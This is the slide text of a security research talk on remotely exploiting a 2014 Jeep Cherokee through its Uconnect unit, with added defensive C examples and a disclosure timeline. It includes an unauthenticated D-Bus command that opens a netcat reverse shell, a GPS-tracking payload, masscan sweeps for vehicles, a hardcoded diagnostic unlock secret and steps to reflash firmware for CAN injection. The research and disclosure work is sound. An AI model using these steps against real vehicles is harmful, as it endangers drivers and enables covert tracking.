Remote Exploitation of an Unaltered Passenger Vehicle

Dr. Charlie Miller (cmiller@openrce.org)

Chris Valasek (cvalasek@gmail.com)


Introduction


You should know us by now…

Dr. Charlie Miller, Security Engineer at Twitter (@0xcharlie)

Chris Valasek, Director of Vehicle Security Research at IOActive (@nudehaberdasher)


Disclaimer

• Enjoy the talk
• The full details will be in our 90-page white paper
• To be released Aug 10


Public service announcement

Please STOP saying UNHACKABLE, you’re going to look silly


Overview

• Introduction

• Getting remote code running via Wi-Fi

• Expanding to cellular

• Head unit payloads

• Flashing CAN chip

• Cyberphysical payloads


Remote Attacks


Remote Attack Paradigm

Remote attack surfaces: TPMS, Telematics (CDMA/3G/4G/LTE), Bluetooth, Wi-Fi, In-car apps, Remote keyless entry

1. Remote compromise


Remote Attack Paradigm

Running exploit -> CAN / LIN / MOST / Flexray

1. Remote compromise
2. Lateralization


Remote Attack Paradigm

ECUs on the bus: Engine, Sensors, Occupant safety, Power Steering, Self-Parking, Radio, Transmission, ABS

CAN / LIN / MOST / Flexray

1. Remote compromise
2. Lateralization
3. CAN message analysis (in advance)


Remote Attack Paradigm

Targets: Pre-Collision System, Self-Parking, Adaptive Cruise Control

Running exploit -> CAN / LIN / MOST / Flexray

1. Remote compromise
2. Lateralization
3. CAN message analysis (in advance)
4. CAN message injection
   • Reprogram firmware
   • Functionality


The Vehicle


2014 Jeep Cherokee

http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg


Uconnect 8.4AN RA4 (Harman Kardon)


# pidin info

CPU:ARM Release:6.5.0 FreeMem:91Mb/512Mb BootTime:Jul 30 21:45:38 2014

Processes: 107, Threads: 739

Processor1: 1094697090 Cortex A8 800MHz FPU


Jail Break


Jailbreaking the Uconnect

• Was NOT required for remote exploit
• Was invaluable for gaining knowledge about the OS / services
• NOT, I repeat, NOT needed for remote exploitation


Wi-Fi


Problems with attacks over Wi-Fi

• Not on by default
• Need to connect to WPA2 network

Page 22: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)

WPA2 password

#include <stdlib.h>
#include <time.h>

/* convert_byte_to_ascii_letter() is a firmware routine not shown on the slide. */
char *get_password() {
    int c_max = 12;
    int c_min = 8;
    unsigned int t = time(NULL);   /* seed is the current time in seconds */
    srand(t);
    unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;
    char *password = malloc(len);  /* no room for a terminating NUL */
    int v9 = 0;
    do {
        unsigned int v10 = rand();
        int v11 = convert_byte_to_ascii_letter(v10 % 62);
        password[v9] = v11;
        v9++;
    } while (len > v9);
    return password;
}


Password guessing

• Password based on when unit was first started
  • With second precision
• We know the year, if you guess the month
  • 15 million password possibilities
• If you supposed it was during the day
  • 7 million password possibilities
• Should be possible to brute force in under an hour


Setting the time…

local rtcTime = getV850RealtimeClock()
local rtcValid = false
if rtcTime == nil or rtcTime.year == 65535 or rtcTime.month == 255 or rtcTime.day == 255 or
   rtcTime.hour == 255 or rtcTime.min == 255 or rtcTime.sec == 255 then
  dbg.print("Clock: start -- V850 time not received or is set to factory defaults")
...
if rtcValid == false then
  dbg.print("Clock: start -- Unable to create the UTC time from V850")
  setProperty("timeFormat24", false)
  setProperty("enableClock", true)
  setProperty("gpsTime", true)
  setProperty("manualUtcOffset", 0)
  -- fallback: the system clock is set to a fixed date when the V850 RTC is unset
  defTime = {}
  defTime.year = 2013
  defTime.month = 1
  defTime.day = 1
  defTime.hour = 0
  defTime.min = 0
  defTime.sec = 0
  defTime.isdst = false
  setSystemUTCTime(os.time(defTime))
  timeFormatOverride = false
  enableClockOverride = false
end


Actually it's easy!

• My WPA2 password was “TyYMxfPhZxkp”
• This corresponds to Epoch time 0x50e22720
• This is Jan 01 2013 00:00:32 GMT
• Took 32 seconds for WifiSvc to get started up
• Really only a few dozen passwords to try
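The password generator, the clock fallback and the guessing slides together say one thing: the WPA2 key is a pure function of a time() seed, and the seed comes from a tiny window (fixed 2013-01-01 default plus the service start-up delay). The C below is an added illustration, not code from the talk or the Uconnect firmware: it reconstructs the generator with the seed as a parameter, shows how a known boot window pins the seed down, and sets a CSPRNG-backed generator beside it. The letter mapping for convert_byte_to_ascii_letter is assumed (its body is not on the slides), and this libc's rand() differs from the head unit's, so the string "TyYMxfPhZxkp" itself is not reproduced.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PW_MIN 8
#define PW_MAX 12

static const char ALPHABET[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

/* Stand-in for the slide's convert_byte_to_ascii_letter(), whose body is not
 * shown; mapping 0..61 onto [A-Za-z0-9] in this order is an assumption. */
static char to_letter(unsigned v) { return ALPHABET[v % 62]; }

/* The slide's generator with the seed passed in instead of read from
 * time(NULL). Length and every character derive from that single value. */
int weak_password(unsigned seed, char *out, size_t cap) {
    srand(seed);
    unsigned len = (unsigned)(rand() % (PW_MAX - PW_MIN + 1)) + PW_MIN;
    if (len + 1 > cap) return -1;
    for (unsigned i = 0; i < len; i++)
        out[i] = to_letter((unsigned)rand() % 62);
    out[len] = '\0';   /* the original never terminates its buffer */
    return (int)len;
}

/* Audit check: does a window of plausible boot times explain a given
 * password? On the Jeep the window was "factory-default clock (2013-01-01
 * 00:00:00 UTC) plus the WifiSvc start-up delay", i.e. a few dozen seeds.
 * Returns the matching seed, or -1 if no seed in the window reproduces it. */
long recover_seed(const char *observed, unsigned first_seed, unsigned window) {
    char buf[PW_MAX + 1];
    for (unsigned s = first_seed; s < first_seed + window; s++)
        if (weak_password(s, buf, sizeof buf) > 0 && strcmp(buf, observed) == 0)
            return (long)s;
    return -1;
}

/* Hardened form: bytes from the kernel CSPRNG, with rejection sampling so
 * that the modulo does not bias the length or character distribution. */
int strong_password(char *out, size_t cap) {
    FILE *rnd = fopen("/dev/urandom", "rb");
    if (!rnd) return -1;
    unsigned char b;
    unsigned len, i = 0;
    do {                                   /* length: 255 = 51 * 5, reject 255 */
        if (fread(&b, 1, 1, rnd) != 1) { fclose(rnd); return -1; }
    } while (b == 255);
    len = PW_MIN + b % (PW_MAX - PW_MIN + 1);
    if (len + 1 > cap) { fclose(rnd); return -1; }
    while (i < len) {                      /* characters: 248 = 4 * 62 */
        if (fread(&b, 1, 1, rnd) != 1) { fclose(rnd); return -1; }
        if (b >= 248) continue;
        out[i++] = ALPHABET[b % 62];
    }
    out[len] = '\0';
    fclose(rnd);
    return (int)len;
}

int main(void) {
    char pw[PW_MAX + 1];
    weak_password(0x50e22720u, pw, sizeof pw);   /* the slide's epoch value */
    printf("seed 0x50e22720 -> %s, recovered 0x%lx\n", pw,
           recover_seed(pw, 0x50e22700u, 64));
    if (strong_password(pw, sizeof pw) > 0) printf("CSPRNG -> %s\n", pw);
    return 0;
}
```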


Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDT
Nmap scan report for 192.168.5.1
Host is up (0.0036s latency).
PORT      STATE SERVICE
2011/tcp  open  raid-cc
2021/tcp  open  servexec
4400/tcp  open  unknown
6010/tcp  open  x11
6020/tcp  open  unknown
6667/tcp  open  irc
51500/tcp open  unknown
65200/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds


D-Bus


D-Bus: Overview

• Interprocess communications
• Can require authentication
  • Jeep did NOT
• We used D-Feet to look at services
• dbus-python for scripts / exploits

$ telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK 4943a53752f52f82a9ea4e6e00000001
BEGIN


D-Bus: Services & Methods


D-Bus: Command Line Injection

NavTrailService

function methods.rmTrack(params, context)
  return {
    -- params.filename is spliced straight into a shell command line
    result = os.execute("rm \"" .. trail_path_saved .. params.filename .. "\"")
  }
end

* Many others contained command line injection vulnerabilities
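rmTrack hands an attacker-controlled filename to a shell through os.execute, and the next slide shows an execute method that needs no bug at all because the bus accepts AUTH ANONYMOUS. A hardened handler takes the shell out of the path entirely: validate the name, assemble the path with snprintf, and call unlink(). The C below is an added illustration, not code from the Uconnect services; the directory argument stands in for the slide's trail_path_saved.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Accept only a plain file name for a trail: no path separators (so no
 * traversal out of the trail directory), no leading dot (so no "." or ".."),
 * and only [A-Za-z0-9._-], which also excludes every shell metacharacter the
 * os.execute() version could be tricked with. Returns 1 if acceptable. */
int trail_name_ok(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64 || name[0] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
        if (!ok) return 0;
    }
    return 1;
}

/* Hardened rmTrack: no shell anywhere. The path is assembled with snprintf
 * and removed with unlink(2), so the file name is only ever data.
 * Returns 0 on success, -2 if the name is rejected, -1 if unlink fails. */
int remove_track(const char *trail_dir, const char *name) {
    if (!trail_name_ok(name)) return -2;
    char path[PATH_MAX];
    int n = snprintf(path, sizeof path, "%s/%s", trail_dir, name);
    if (n < 0 || (size_t)n >= sizeof path) return -2;
    return unlink(path) == 0 ? 0 : -1;
}

int main(void) {
    /* Constructed demo: create a trail file, then remove it through the handler. */
    const char *dir = "/tmp", *name = "navtrail_example_track.gpx";
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/%s", dir, name);
    FILE *f = fopen(path, "w");
    if (f) fclose(f);
    printf("remove %-28s -> %d\n", name, remove_track(dir, name));
    printf("remove %-28s -> %d\n", "../passwd", remove_track(dir, "../passwd"));
    printf("remove %-28s -> %d\n", "x\"y", remove_track(dir, "x\"y"));
    return 0;
}
```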


D-Bus: No vulnerability needed

NavTrailService

"com.harman.service.NavTrailService":
{"name":"com.harman.service.NavTrailService",
"methods":{"symlinkattributes":"symlinkattributes","getProperties":"getProperties","execute":"execute","unlock":"unlock","navExport":"navExport","ls":"ls","attributes":"attributes" …

#!python
import dbus
# unauthenticated D-Bus exposed over TCP on port 6667
bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavTrailService')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')


We basically revealed the vulnerability last year!


Uconnect Payloads


GPS Tracker 3000

#!python
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=X.X.X.X,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NDR', '/com/harman/service/NDR')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('JSON_GetProperties','{"inprop":["SEN_GPSInfo"]}')


HVAC

require "service"
params = {}
control = {}
params.zone = "front"
control.fan = arg[1]
params.controls = control
x = service.invoke("com.harman.service.HVAC", "setControlProperties", params)


Radio Volume

require "service"
params = {}
params.volume = tonumber(arg[1])
x = service.invoke("com.harman.service.AudioSettings", "setVolume", params)


Cellular Exploitation


Netstat Review

# netstat -n | grep LISTEN

tcp 0 0 *.6010 *.* LISTEN

tcp 0 0 *.2011 *.* LISTEN

tcp 0 0 *.6020 *.* LISTEN

tcp 0 0 *.2021 *.* LISTEN

tcp 0 0 127.0.0.1.3128 *.* LISTEN

tcp 0 0 *.51500 *.* LISTEN

tcp 0 0 *.65200 *.* LISTEN

tcp 0 0 *.4400 *.* LISTEN

tcp 0 0 *.6667 *.* LISTEN


Finding the Jeep’s IP

# ifconfig

lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33192

inet 127.0.0.1 netmask 0xff000000

pflog0: flags=100<PROMISC> mtu 33192

uap0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500

address: 30:14:4a:ee:a6:f8

media: <unknown type> autoselect

inet 192.168.5.1 netmask 0xffffff00 broadcast 192.168.5.255

ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1472

inet 21.28.103.144 -> 68.28.89.85 netmask 0xff000000


Femto-Cell Comms

• Airave 2.0
• We bought 2 ‘stolen’ ones before getting a working device (Thanks Ebay!)
• Public Jailbreak (turns on port 23)
• Successful in communicating w/ the Jeep!
• Range ~ 30m


How far?


Long Distance Communications (Sprint)


Searching for Vehicles

$ bin/masscan 21.0.0.0/8 -p6667
$ bin/masscan 25.0.0.0/8 -p6667



Gathering Vehicle Information


./shutupdave.py

Scanning 21.18.23.0...

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-06-16 19:09:28 GMT

-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth

Initiating SYN Stealth Scan

Scanning 256 hosts [1 port/host]

Scan complete

Found 2 hosts

21.18.23.151 : 1C4RJFCMXEXXXXXXX , 2014 JEEP GRAND+CHEROKEE+OVERLAND

21.18.23.97 : 1C6RR7PT8DXXXXXXX , 2013 RAM 1500+LONGHORN


Vehicles Located via Scanning

2013 DODGE VIPER
2013 RAM 1500
2013 RAM 2500
2013 RAM 3500
2013 RAM CHASSIS 5500
2014 DODGE DURANGO
2014 DODGE VIPER
2014 JEEP CHEROKEE
2014 JEEP GRAND CHEROKEE
2014 RAM 1500
2014 RAM 2500
2014 RAM 3500
2014 RAM CHASSIS 5500
2015 CHRYSLER 200
2015 JEEP CHEROKEE
2015 JEEP GRAND CHEROKEE


Vehicle Estimates

• We found 19 duplicate VINs in a scan of 2694 vehicles
• Estimated 381,980 +/- 89,393
• We now know that the real number is 1.4 million. We obviously went with a conservative estimate


Uconnect firmware (v850)


Now we send CAN messages?


Inside Uconnect

CAN / SPI


Inside the Uconnect


Updating the V850: Firmware

# iocupdate -c 4 -p usr/share/V850/cmcioc.bin

• V850 firmware is NOT signed

• No code signing mechanism present

• Updating only works if v850 in “bootrom” mode


V850 Internals: CAN Modules & Addressing

http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp


V850 Internals: CAN Registers

http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp


V850 Internals: Base Address


V850 Internals: Segments & Initial Values


V850 Internals: CAN Data Buffer XREFs


V850 Internals: Setting CAN Data Values


V850 Internals: SPI Parser

file = '/dev/ipc/ch7'

g = assert(ipc.open(file))

f = assert(io.open(file, "r+b"))

g:write(0xf0, 0x02)

bytes = f:read(0x18)

print(hex_dump(bytes))

g:close()

f:close()


V850 Internals: SPI Memory Corruption Bugs


V850 Internals: Sending Arbitrary CAN Msgs


USB-less upgrade

• To flash v850, it needs to be in bootrom mode
• If you put it in bootrom mode, it restarts OMAP in upgrade mode
  • Attacker loses control
• Initial bootup code runs from read-only filesystem
• Calls “hd” application which lives in writable portion of filesystem
• Replace hd with your code that can run while v850 in bootrom mode


Make a mistake?


Exploit Chain


Step 1: Find IP address of a vehicle


Step 2: Get code running on OMAP chip


Step 3: Reflash the v850, reboot


Step 4: Send arbitrary CAN messages


Cyber Physical Internals


wiTECH: Overview


wiTECH: Security Unlocks


wiTECH: SecurityAccess

Uc.init("G3n3r@ti0n", "MD5", "", "BC", "AES", new String[] {
    "com.chrysler.lx.UnlockCryptographerTest",
    "com.dcx.securityunlock.encrypted.EncryptedSecurityUnlock", "",
    "com.dcx.NGST.jCanFlash.flashfile.efd2.SecurityUnlockBuilderImpTest"
});


PAM: Checksums

Jeep Checksums

IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F

IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9

IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09

Prius Checksums

IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83

IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85

IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89
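The six frames above are enough to recover both checksums: the Prius byte is the low byte of IDH + IDL + Len + payload, and all three Jeep frames verify as CRC-8 with polynomial 0x1D, initial value 0xFF and final XOR 0xFF (CRC-8/SAE-J1850) over the payload bytes before the checksum. The C below is added here, not taken from the talk or the vehicle firmware; it implements both receiver-side checks and tests them against the slide's frames, and treating the Jeep formulation as the rule for other IDs is an assumption, since all three vectors share ID 0x20C. Either value is computable by anyone on the bus: a checksum catches corruption, not forged frames, which is why it is no substitute for message authentication.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* A frame as printed on the slide: 11-bit ID split into IDH/IDL, DLC, payload. */
typedef struct {
    uint8_t idh, idl, len;
    uint8_t data[8];
} can_frame_t;

/* Jeep (PAM) checksum: CRC-8, polynomial 0x1D, init 0xFF, final XOR 0xFF
 * (CRC-8/SAE-J1850) over the payload bytes that precede the checksum byte.
 * Verified against the three Jeep frames on the slide; since they share one
 * ID, whether other IDs follow the same rule is an assumption. */
uint8_t jeep_checksum(const uint8_t *data, size_t n) {
    uint8_t crc = 0xFF;
    for (size_t i = 0; i < n; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc & 0x80) ? (uint8_t)((crc << 1) ^ 0x1D) : (uint8_t)(crc << 1);
    }
    return (uint8_t)(crc ^ 0xFF);
}

/* Prius checksum: low byte of IDH + IDL + Len + the payload bytes before
 * the checksum byte (0x02 + 0xE4 + 0x05 + 0x98 = 0x183 -> 0x83). */
uint8_t prius_checksum(const can_frame_t *f) {
    unsigned sum = f->idh + f->idl + f->len;
    for (size_t i = 0; i + 1 < f->len; i++)
        sum += f->data[i];
    return (uint8_t)sum;
}

/* Receiver-side checks: the last payload byte must equal the computed value. */
int jeep_frame_valid(const can_frame_t *f) {
    return f->len >= 1 && f->len <= 8 &&
           jeep_checksum(f->data, f->len - 1) == f->data[f->len - 1];
}

int prius_frame_valid(const can_frame_t *f) {
    return f->len >= 1 && f->len <= 8 &&
           prius_checksum(f) == f->data[f->len - 1];
}

/* The six frames from the slide, used here as test vectors. */
static const can_frame_t JEEP_FRAMES[3] = {
    {0x02, 0x0C, 4, {0x80, 0x00, 0x06, 0x7F}},
    {0x02, 0x0C, 4, {0x80, 0x00, 0x08, 0xD9}},
    {0x02, 0x0C, 4, {0x80, 0x00, 0x19, 0x09}},
};
static const can_frame_t PRIUS_FRAMES[3] = {
    {0x02, 0xE4, 5, {0x98, 0x00, 0x00, 0x00, 0x83}},
    {0x02, 0xE4, 5, {0x9A, 0x00, 0x00, 0x00, 0x85}},
    {0x02, 0xE4, 5, {0x9E, 0x00, 0x00, 0x00, 0x89}},
};

/* How many of the slide's six frames pass their vehicle's check. */
int slide_frames_passing(void) {
    int ok = 0;
    for (int i = 0; i < 3; i++) {
        ok += jeep_frame_valid(&JEEP_FRAMES[i]);
        ok += prius_frame_valid(&PRIUS_FRAMES[i]);
    }
    return ok;
}

/* A payload byte changed without recomputing the checksum is rejected;
 * a sender that recomputes it is not, which is the limit of a CRC. */
int jeep_tamper_detected(void) {
    can_frame_t f = JEEP_FRAMES[0];
    f.data[2] ^= 0x01;
    return !jeep_frame_valid(&f);
}

int main(void) {
    printf("slide frames passing: %d/6\n", slide_frames_passing());
    printf("corrupted Jeep frame rejected: %s\n",
           jeep_tamper_detected() ? "yes" : "no");
    return 0;
}
```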


PAM: Device


PAM: Checksum Code


Capturing CAN messages


This year… METAL


Cyber Physical action!


Normal CAN messages - example


wipers


Turn signals


speedometer


Diagnostic CAN messages


Diagnostic + Normal CAN messages

Diagram: Us, Target ECU, Normal source of traffic


Shut down source

Diagram: Us, Target ECU, Normal source of traffic (shut down)


Become the source!

Diagram: Us, Target ECU, Normal source of traffic (we replace the source)


steering


Braking


Disclosure


Disclosure Timeline

• Oct 24, 2014 -> Vulnerabilities disclosed to FCA

• Mar 2, 2015 -> Disclosed ability to send CAN msgs remotely

• Apr 10, 2015 -> Full scope of hack disclosed

• May 12, 2015 -> FCA informed of cellular vector confirmation

• Jun 2, 2015 -> FCA informed of nation-wide cellular confirmation

• Jul 16, 2015 -> FCA given pre-release copy of our paper/research

• Jul 16, 2015 -> FCA releases Uconnect patch

• Jul 20, 2015 -> Wired article/video

• Jul 24, 2015 -> Sprint network blocks port 6667 traffic

• Jul 24, 2015 -> FCA Recalls 1.4MM vehicles vulnerable to attack


Additional testing?


Impact


Wired story

Recall


stagefright


Twitter


Conclusion


Conclusions

• Remote compromise of a connected vehicle is possible
  • This is NOT just a FCA issue. More connectivity requires more security
• These issues are a combination of: OEMs, Tier-1s, Telecom
• Take this information and look at other cars
  • We’re just two bros with one car
• What might be considered an ‘air-gap’ may not be one in reality
  • Cellular -> Uconnect -> Reprogram Firmware -> SPI
• Architecture can introduce more hurdles
• Hackers now have an example of making real-world impact


Questions?